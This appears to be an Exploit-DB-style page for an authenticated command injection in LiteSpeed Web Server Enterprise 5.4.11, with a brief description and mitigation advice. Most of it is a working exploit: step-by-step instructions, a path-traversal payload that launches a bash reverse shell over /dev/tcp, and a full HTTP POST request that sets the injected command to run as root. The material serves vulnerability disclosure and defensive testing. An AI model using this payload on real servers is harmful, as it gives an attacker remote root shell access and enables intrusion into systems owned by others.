header-logo
Suggest Exploit
vendor:
LiteSpeed Web Server Enterprise
by:
cmOs - SunCSR
N/A
CVSS
HIGH
Command Injection
78
CWE
Product Name: LiteSpeed Web Server Enterprise
Affected Version From: 5.4.11
Affected Version To: 5.4.11
Patch Exists: NO
Related CWE:
CPE: a:litespeed_technologies:litespeed_web_server_enterprise:5.4.11
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu, Kali Linux
2021

LiteSpeed Web Server Enterprise 5.4.11 – Command Injection (Authenticated)

The LiteSpeed Web Server Enterprise version 5.4.11 is vulnerable to command injection. An authenticated attacker can exploit this vulnerability to execute arbitrary commands on the server. The vulnerability exists in the 'Server Configuration > Server > External App > Edit' section, where the 'Command' value is not properly sanitized. By injecting a malicious payload, an attacker can execute arbitrary commands with the privileges of the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of LiteSpeed Web Server Enterprise. Additionally, restrict access to the dashboard and ensure strong authentication measures are in place.
Source

Exploit-DB raw data:

# Exploit Title: LiteSpeed Web Server Enterprise 5.4.11 - Command Injection (Authenticated)
# Date: 05/20/2021
# Exploit Author: cmOs - SunCSR
# Vendor Homepage: https://www.litespeedtech.com/
# Software Link: https://www.litespeedtech.com/products
# Version: 5.4.11
# Ubuntu/Kali Linux


Step 1: Log in to the dashboard using the Administrator account.
Step 2 : Access Server Configuration > Server > External App > Edit
Step 3: Set "Start By Server *" Value to "Yes (Through CGI Daemon)
Step 4 : Inject payload "fcgi-bin/lsphp5/../../../../../bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/1234 0>&1'" to "Command" value
Step 5: Graceful Restart

[POC]

POST /config/confMgr.php HTTP/1.1
Host: 192.168.1.6:7080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101
Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*
;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
https://192.168.1.6:7080/config/confMgr.php?m=serv&p=ext&t=A_EXT_FCGI&r=file&a=E&tk=0.59220300%201612516386
Content-Type: application/x-www-form-urlencoded
Content-Length: 505
Origin: https://192.168.1.6:7080
Connection: close
Cookie: LSWSWEBUI=85fa7ba9b37d18d57e41e092a2a2a61f;
lsws_uid=j%2FsI8GRiKBc%3D; lsws_pass=c7pC2izvdbQ%3D
Upgrade-Insecure-Requests: 1

name=file&address=127.0.0.1%3A5434&note=&maxConns=2000&env=&initTimeout=1&retryTimeout=1&persistConn=1&pcKeepAliveTimeout=20&respBuffer=0&autoStart=1&path=fcgi-bin%2Flsphp5%2F..%2F..%2F..%2F..%2F..%2Fbin%2Fbash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.1.6%2F1234+0%3E%261%27&backlog=&instances=&extUser=root&extGroup=root&umask=&runOnStartUp=3&extMaxIdleTime=&priority=&memSoftLimit=&memHardLimit=&procSoftLimit=&procHardLimit=&a=s&m=serv&p=ext&t=A_EXT_FCGI&r=file&tk=0.59220300+1612516386&file_create=